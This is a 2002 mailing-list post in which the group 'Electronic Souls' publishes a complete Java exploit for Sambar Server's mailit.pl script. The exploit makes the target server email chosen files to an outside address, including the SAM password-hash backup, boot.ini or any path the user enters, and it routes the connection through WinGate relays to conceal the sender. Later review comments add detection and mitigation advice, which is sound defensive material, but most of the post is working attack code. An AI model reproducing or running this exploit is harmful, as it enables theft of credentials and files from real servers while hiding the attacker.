Message-ID: <200211291721.gATHLE9J053322@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Sambar Exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is an exploit for Sambar Server's mailit.pl, written in JAVA. we
were taught JAVA by KF[0dd], the internet's premier exploit writing
genius, and technical support to most ADM/0dd exploits.
# cat SambarMailit.java
/*---Written by Craig[TM]--- Electronicsouls-2001
* This little java Exploit will use Sambar Servers' mailit.pl
* to send any file to your eMail address.
*
* To use this, you need a...
*
* - mail relay
* - secure eMail address (http://www.hushmail.com)
* - java compiler and a Sambar Server<=4.2 with mailit.pl of course
*
* When using WinGates, separate them with "," like this:
* Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1
*
* This exploit should leave NO logfiles - well, at least on my own server it did not!
*
*
* BTW:I dunno if I may call this '0day' - somewhere on
* a blackhead website i found a hint that there was an issue with
* mailit.pl, so I figured it out...
*
*
* [Craig]
*
* He...don't use this to deface...this is proof-of-concept code only!
*
* Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN!
*
*/
import java.io.*;
import java.net.*;
import java.util.*;
/**
 * Console client that sends a single HTTP POST to /cgi-bin/mailit.pl on a
 * chosen host. The form body names a server-local file in the "attach" field
 * and an outside address in "recipient"; according to the file header, the
 * mailit.pl shipped with Sambar Server <= 4.2 then mails that file out.
 *
 * Review notes (defensive reading of this listing):
 * - Request shape, as built in main(): POST /cgi-bin/mailit.pl with a fixed
 *   User-Agent string and the body fields server=, recipient=, body=Phile4U,
 *   attach=, from=hacked@HOST and subject=Sambar-File. Those literals are
 *   trivially edited, so log searches and IDS rules are better keyed on a
 *   POST to mailit.pl whose attach value is a filesystem path (raw or
 *   URL-encoded) than on the marker strings alone.
 * - The header's "leaves NO logfiles" is the author's observation on one
 *   server, not something this code enforces; whether the request is logged
 *   depends on the target's own logging configuration.
 * - When relays are used (see Verbinde), the address the web server sees is
 *   the last relay, so the source IP does not identify the sender.
 * - The "server" field carries an SMTP host chosen by the sender; presumably
 *   the script connects out to it, so unexpected outbound SMTP from the web
 *   server host is a second place to look (confirm against mailit.pl itself).
 * - Mitigation is on the server side: remove or access-restrict mailit.pl
 *   where it is not needed, move off the affected version, and limit
 *   outbound SMTP from the web server. Menu option 1 asks for the repair
 *   copy of the SAM hive, which holds local account password hashes; if
 *   that request is found in logs, treat those credentials as exposed.
 *
 * All state is static and shared between the instance methods; nothing here
 * is thread-safe, and the class is only driven from main().
 */
public class SambarMailit
{
//line from server that is read in
static String line="";
//arrays for wingates
//fixed capacity of 100 entries; unused slots stay null and the null marks the end of the list
static String Wingates[]=new String[100];
//vars for the user input from console
//SMTPServer, Server, File and eMail are copied unmodified into the request body/headers in main()
static String SMTPServer;
static String Server;
static String File;
static String eMail;
//the shit for the socket ;)
//"in" wraps the console; several methods shadow it with a local of the same name.
//sin/sout/s are the socket and its streams, set by Verbinde() and left null if it fails.
static DataInputStream in = new DataInputStream (System.in);
static DataInputStream sin;
static PrintStream sout;
static Socket s=null;
//some "switches" int the program
//useWingates: set by HoleWingates() when at least one relay was entered
//Mode: menu choice 1-4 read by HoleModus()
static boolean useWingates=false;
static int Mode;
//the user menu
//Prints the four options, reads one line from the console and stores it in Mode.
//Exits the JVM on an out-of-range number or on option 4.
//Only IOException is caught here; a non-numeric line makes Integer.valueOf throw
//NumberFormatException, which propagates to the caller.
void HoleModus()
{
try
{
System.out.println("What do you want?");
System.out.println("(1) send me C:\\winnt\\repair\\sam._");
System.out.println("(2) send me C:\\boot.ini");
System.out.println("(3) send me a file I want");
System.out.println("(4) quit");
System.out.print(">");
DataInputStream in = new DataInputStream (System.in);
String raw=in.readLine();
Mode=Integer.valueOf(raw).intValue();
//Mode%1 is always 0 for an int, so only the range test has any effect
if (Mode<1 || Mode>4 || Mode%1!=0)
{System.out.println("invalid option! quitting...");System.exit(0);}
if (Mode==4)System.exit(0);
System.out.print("\n");
}//try
catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
}//HoleModus
//ask user for server
//Stores the line as typed in Server; it is later used as the connect target
//(or relay command argument), in the Host header and in the from= field.
void HoleServer()
{
try
{
System.out.print("Enter Server>");
DataInputStream in = new DataInputStream (System.in);
Server=in.readLine();
}//try
catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
}//HoleServer
//ask user for wingates - i would strongly suggest to use this!
//Splits one comma-separated console line into Wingates[], trimming each entry,
//and sets useWingates when the first slot was filled.
//NOTE(review): the loop is bounded by the token count, not by the array's 100 slots.
void HoleWingates()
{
try
{
System.out.print("Enter Wingate/s>");
DataInputStream in = new DataInputStream (System.in);
String WingatesRaw=in.readLine();
StringTokenizer token = new StringTokenizer(WingatesRaw, ",");
int num_tokens = token.countTokens();
for (int i = 0;i< num_tokens;i++)
{
Wingates[i]=token.nextToken();
Wingates[i]=Wingates[i].trim();
}
//NOTE(review): != "" compares object references, not string contents
if (Wingates[0]!=null && Wingates[0]!="")useWingates=true;
//for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]);
}//try
catch (IOException e) {System.out.println("Error with your Wingates:"+e);}
}//HoleWingates
//ask user where to download and so on...
//Reads the SMTP host (SMTPServer) and the recipient address (eMail) from the console;
//in mode 3 it also reads the path that will be placed in the attach= field (File).
void HoleOptions()
{
try
{
System.out.print("Mail relay>");
in = new DataInputStream (System.in);
SMTPServer=in.readLine();
System.out.print("My eMail>");
in = new DataInputStream (System.in);
eMail=in.readLine();
if (Mode==3)
{
System.out.print("File to send>");
DataInputStream in = new DataInputStream (System.in);
File=in.readLine();
}
}
catch (IOException e){System.out.println("Error reading input from Console:"+e);}
}//HoleOptions
//connect to the server with or without WinGates
//Without relays: opens a TCP connection straight to Server on port 80.
//With relays: opens a connection to the first entry on port 23, sends "<host> 23"
//for each further entry and finally "<Server> 80", echoing one reply line per hop.
//Seen from the target, the connection then originates from the last relay in the list.
//An IOException is only printed; s, sin and sout keep whatever value they had before.
void Verbinde()
{
try
{
if (useWingates==true)
{
s = new Socket(Wingates[0], 23);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
//walk the remaining entries until the first null slot
for (int i=1;Wingates[i]!=null;i++)
{
System.out.println("Trying to connect to "+Wingates[i]+"...");
sout.println(Wingates[i]+" 23");
line=sin.readLine();
System.out.println(line);
}
System.out.println("Now trying to connect to "+Server+":80...");
sout.println(Server+" 80");
System.out.println((line=sin.readLine()));
}
else
{
s = new Socket(Server, 80);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
}
}//try
catch (IOException e){System.out.println("Error Connecting:"+e);}
}//verbinde()
//main program
//Collects the console input, connects, writes one POST request and prints the
//response until it sees one of mailit.pl's result strings or the stream ends.
//args is not used.
public static void main(String[] args)
{
System.out.println("\nCraig's Sambar<=4.2 (0day?) mailit.pl Exploit");
SambarMailit Sam=new SambarMailit();
Sam.HoleModus();
Sam.HoleServer();
Sam.HoleWingates();
Sam.HoleOptions();
try
{
//modes 1 and 2 use fixed paths; mode 3 keeps the path read by HoleOptions()
if (Mode==1)File="C:\\winnt\\repair\\sam._";
if (Mode==2)File="C:\\boot.ini";
Sam.Verbinde();
//NOTE(review): sout is used without checking that Verbinde() actually connected
//request line and headers; the User-Agent is a fixed literal
sout.println("POST /cgi-bin/mailit.pl HTTP/1.1");
sout.println("Content-Type: application/x-www-form-urlencoded");
sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
sout.println("Host: "+Server);
//for the POST command, we need to know the exact length of data to send
//72 is the combined length of the fixed parts of the body written below
//("server=", "&recipient=", "&body=Phile4U", "&attach=", "&from=hacked@", "&subject=Sambar-File")
int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length();
sout.println("Content-Length: "+l);
//the embedded \n plus println's own line end give the blank line that ends the headers
sout.println("Connection: Keep-Alive\n");
//form body: the values are concatenated as typed, without URL-encoding; the inline
//comment shows the encoded form of the mode-1 path, which a log search should match as well
sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai
r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File");
System.out.println();
//echo the response line by line; stop at end of stream or at either result string
while (true)
{
line=sin.readLine();
if (line==null)break;
System.out.println(line);
if (line.indexOf("MailIt Failed")>-1)
{System.out.println("ERROR!\n\n");break;}
if (line.indexOf("MailIt Succeeded.")>-1)
{System.out.println("SUCCESS!\n\n");break;}
}
s.close();
}//try
catch (IOException e){System.out.println("Error!:"+e);}
}//main
}//class
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Short Music For Short People."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN
jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA==
=8b73
-----END PGP SIGNATURE-----